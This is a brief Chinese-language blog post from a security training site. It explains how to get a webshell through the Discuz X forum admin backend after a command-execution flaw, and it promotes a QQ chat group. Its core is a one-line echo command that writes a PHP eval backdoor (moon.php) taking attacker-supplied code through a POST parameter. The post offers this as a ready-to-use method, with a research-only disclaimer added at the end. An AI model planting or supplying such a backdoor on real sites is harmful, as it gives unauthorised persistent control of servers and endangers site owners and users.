DiscuzX系列后台GETSHELL附方法
作者 mOon www.moonsec.com
最近不少学员来问道 dzx 后台怎么拿WEBSHELL。
最近刚好有个洞洞,不过很多人还是不知道噢,因为很多论坛没有公布具体方法。
wooyun知识库发了恩多Dx的洞洞分析
http://drops.wooyun.org/papers/4611
。。。。。。。。。。。。。。。。。。。
既然可以执行命令。基本上可以拿SHELL
但是有一定的局限。iis基本没权限
拿webshell方法、如下
echo '^<?php eval($_POST[moon]);?^>' >moon.php&
没加群的同学记得加群咯。
点击链接加入群【暗月信息安全交流群】:http://jq.qq.com/?_wv=1027&k=XO2uoK
QQ群 131634501 群里有妹子噢
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论